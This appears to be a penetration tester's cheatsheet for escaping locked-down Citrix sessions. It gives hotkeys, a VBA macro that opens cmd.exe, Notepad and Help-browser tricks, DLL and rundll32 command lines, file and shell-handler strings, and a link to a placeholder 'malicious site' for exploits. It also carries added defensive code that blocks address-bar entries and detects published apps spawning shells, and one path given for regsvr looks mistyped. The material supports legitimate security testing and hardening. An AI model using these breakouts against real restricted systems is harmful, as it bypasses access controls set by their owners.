Citrix breakout cheatsheet

"Citrix is the cloud computing company that enables mobile workstyles, empowering people to work and collaborate from anywhere, accessing apps and data on any of the latest devices, as easily as they would in their own office, simply and securely." Source: Citrix

I am going to assume you already know what a Citrix environment looks like. Below is my attempt to collect, correlate and document various techniques to break out of restricted Citrix environments.

Hotkeys
In Kiosk Mode

| Hotkey Combination | Result |
| --- | --- |
| Ctrl + h | View History |
| Ctrl + n | New Browser |
| Shift + Left Click | New Browser |
| Ctrl + o | Internet Address bar |
| Ctrl + p | Print to file |
| Right Click (Shift + F10) | Save Image As / View Source |
| F1 | Jump to URL |
| SHIFT+F1 | Local Task List |
| SHIFT+F2 | Toggle Title Bar |
| SHIFT+F3 | Close Remote Application |
| CTRL+F1 | Displays Windows Security Desktop – Ctrl+Alt+Del |
| CTRL+F2 | Remote Task List |
| CTRL+F3 | Remote Task Manager – Ctrl+Shift+ESC |
| ALT+F2 | Cycle through programs |
| ALT+PLUS | Alt+TAB |
| ALT+MINUS | ALT+SHIFT+TAB |

Simple tech breakouts
  • Create shortcuts to C:\
  • Create batch files (given below)
  • Create VBScript files (given below)
  • Microsoft Office
    • File -> Save As
      • Provide the direct path to cmd.exe within the address bar.
    • Press F1
      • Search Microsoft
      • Click on Suites Home Page
    • Macros
      • Using Excel Developer (given below)

Using Excel Developer

Source: Carnal0wnage

  • Add the Developer ribbon
    • File –> Options –> Customize Ribbon –> Select Developer in Main Tabs.
  • Click on the Visual Basic button within the Developer tab to enter the breakout code.

  • Enter the following macro code, which opens cmd.exe.

    Sub OpenCMD()
        'Execute EXE file
        'To open PowerShell, change cmd.exe to powershell.exe.
        Shell "CMD /K C:\windows\system32\cmd.exe", vbNormalFocus
    End Sub

  • Save the code and then save the document as a macro-enabled workbook.
  • Now, run the macro and boom..

If Internet Explorer is not available, then provide a hyperlink (e.g. www.myveryownmaliciousite.com/exploits) within the Excel sheet and then click it to open.

Using Notepad

Source: Synjunkie

  1. Open Notepad. Select Help.
  2. Right click on the top left of the Help toolbar.
  3. Select “Jump to Url”
  4. Enter any malicious site, e.g. www.myveryownmaliciousite.com/exploits. The link will open within a built-in browser.
  5. To browse the file system, just replace the URL with the physical path, e.g. C:\windows\system32
  6. This technique can be used to start cmd.exe or powershell.exe, depending on your preference.

Using Notepad #2
  1. If you are working within a restricted desktop, you can create batch files using Notepad.
  2. Enter cmd.exe within Notepad and save as a .bat file. Or you can enter powershell.exe or explorer.exe.
  3. Double click on the saved .bat file and have fun.

Yet more Help coming to help

Source: Synjunkie_2

If Software Restriction Policies (SRP) are in use

Note: cmd.dll is required and must be uploaded to the victim host

Source: Owen Shearing @oshearing (http://rebootuser.com)

c:\windows\regsrv.exe c:\documents and settings\level3\desktop\cmd.dll,ImageView_Fullscreen

Abuse rundll32.exe (a sample)

Source: Owen Shearing @oshearing (http://rebootuser.com)

rundll32.exe shell32.dll,Control_RunDLL timedate.cpl (opens time/date properties)
rundll32.exe shell32.dll,Control_RunDLL desk.cpl (opens display properties)

Useful commands/shortcuts (if address bar is accessible)

Source: http://ikat.ha.cked.net/Windows/index.html

about:<input type=file>
about:<a href=C:\>ClickHere</a>
about:</title><a href=C:\>ClickHere</a>
about:<iframe src=C:\>
about:</title><iframe src=C:\>
res://ieframe.dll/24/123
res://explorer.exe/24/123
file://C:/
file://C:\
file://C:\?http
C:\
C:/
%COMSPEC%
%SYSTEMROOT%
%TMP%
%TEMP%
%ProgramFiles%
%UserProfile%
%windir%

Shell Handler Links (requirements as per above)

Source: http://ikat.ha.cked.net/Windows/index.html

shell:::{208D2C60-3AEA-1069-A2D7-08002B30309D} (network places)
shell:::{7007ACC7-3202-11D1-AAD2-00805FC1270E} (network connections)
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D} (my computer)
shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103} (my documents)
shell:::{E17D4FC0-5564-11D1-83F2-00A0C90DC849} (search)
shell:Administrative Tools
shell:AppData
shell:AppUpdatesFolder
shell:CSCFolder
shell:Common Administrative Tools
shell:Common Desktop
shell:Common Documents
shell:Common AppData
shell:Common Start Menu
shell:Desktop
shell:DesktopFolder
shell:DriveFolder
shell:Downloads
shell:Startup
shell:Windows
shell:UsersFilesFolder
shell:UserProfiles
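
For defenders, the two lists above show why a blocklist of address-bar strings does not hold up: the same local target can be reached through a scheme, a shell handler, an environment variable or a bare path. The following is an added example (not from the original page or its sources) that triages address-bar or "Jump to URL" entries with a default-deny rule; `ALLOWED_HOSTS` and `intranet.example.com` are hypothetical, and the sample entries are taken from the lists above.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only hosts the published browser is meant to reach.
ALLOWED_HOSTS = {"intranet.example.com"}

ENV_VAR = re.compile(r"%[A-Za-z_][A-Za-z0-9_()]*%")    # %COMSPEC%, %windir%
LOCAL_PATH = re.compile(r"^(?:[A-Za-z]:[\\/]|\\\\)")   # C:\, C:/, \\server\share
LOCAL_SCHEMES = {"file", "res", "shell", "about"}

def classify(entry):
    """Return (verdict, reason) for one address-bar entry; default is block."""
    text = entry.strip()
    scheme = text.split(":", 1)[0].lower() if ":" in text else ""
    if scheme in ("http", "https"):
        try:
            host = urlsplit(text).hostname
        except ValueError:          # malformed authority part
            host = None
        if host in ALLOWED_HOSTS:
            return ("allow", "allowlisted host")
        return ("block", "host not allowlisted")
    # Everything below is blocked; the reason is kept for the audit log.
    if ENV_VAR.search(text):
        return ("block", "environment variable")
    if LOCAL_PATH.match(text):
        return ("block", "filesystem path")
    if scheme in LOCAL_SCHEMES:
        return ("block", f"{scheme}: handler")
    return ("block", "unrecognised input")

# Sample entries copied from the two lists above.
PAGE_ENTRIES = [
    "about:<input type=file>", r"about:</title><iframe src=C:\>",
    "res://ieframe.dll/24/123", r"file://C:\?http", "C:\\", "C:/",
    "%COMSPEC%", "%windir%", "shell:Startup",
    "shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}",
]

if __name__ == "__main__":
    for entry in PAGE_ENTRIES + ["https://intranet.example.com/portal"]:
        print(classify(entry), entry)
```
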

PowerShell location (if installed and not locked down)

Source: Owen Shearing @oshearing (http://rebootuser.com)

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe

Other ways of getting a shell

Source: Owen Shearing @oshearing (http://rebootuser.com)

  1. Set the IE homepage to cmd.exe or command.com (if they are not locked down)
  2. An HTML file with the code: <a href=file:///c:\windows\system32\cmd.exe>Command Prompt</a>
  3. A scheduled task to open the required program on login

Can you access any of the following:

cscript.exe
wscript.exe
command.com
cmd.exe
regedit.exe
format.com
runas.exe
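
Most of the techniques on this page end with a published application starting one of the binaries listed above, or with one of them running a file dropped into a user profile. The following is an added detection example (not from the original page or its sources) that checks process-creation events for both patterns; the parent list is an assumption about what is published, and the sample events are constructed.

```python
import ntpath
import re

# Tools named on this page; any of them under a published app is suspect.
WATCHED_CHILDREN = {
    "cscript.exe", "wscript.exe", "command.com", "cmd.exe", "regedit.exe",
    "format.com", "runas.exe", "powershell.exe",
}
# Assumption: applications typically published to users; adjust per farm.
PUBLISHED_PARENTS = {"excel.exe", "winword.exe", "notepad.exe", "iexplore.exe", "hh.exe"}
# A script or DLL referenced from a user-writable profile directory.
USER_PAYLOAD = re.compile(
    r"\\(?:users|documents and settings)\\[^\"]*\.(?:bat|vbs|dll)\b", re.IGNORECASE
)

def image_name(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path.strip('"')).lower()

def findings(event):
    """Return the reasons one Sysmon-style process-creation event is suspicious."""
    parent = image_name(event["ParentImage"])
    child = image_name(event["Image"])
    reasons = []
    if parent in PUBLISHED_PARENTS and child in WATCHED_CHILDREN:
        reasons.append(f"{parent} spawned {child}")
    if child in (WATCHED_CHILDREN | {"rundll32.exe"}) and USER_PAYLOAD.search(event["CommandLine"]):
        reasons.append(f"{child} ran a payload from a user profile")
    return reasons

# Constructed sample events (field names follow Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office15\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"CMD /K C:\windows\system32\cmd.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\Users\level3\Desktop\shell.bat""'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL timedate.cpl"},
]

def triage(events):
    # One (image, reason) pair per finding, in event order.
    return [(image_name(e["Image"]), r) for e in events for r in findings(e)]

if __name__ == "__main__":
    for image, reason in triage(SAMPLE_EVENTS):
        print(image, "->", reason)
```

The third sample event, a plain Control Panel applet launch, produces no finding; whether that should alert on a locked-down session is a policy decision for the farm.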

Using IKAT

coming soon - require content

Using malicious .ICA files

coming soon - require content

If you have any new tricks that you would like to add here, please let me know and I will happily add them here. Full credits to you.

References

  1. http://synjunkie.blogspot.co.uk
  2. http://carnal0wnage.attackresearch.com
  3. Got Citrix? Hack It! by Shanit Gupta at Blackhat USA 2008
  4. Thanks to Owen Shearing @oshearing (http://rebootuser.com) for his valuable inputs.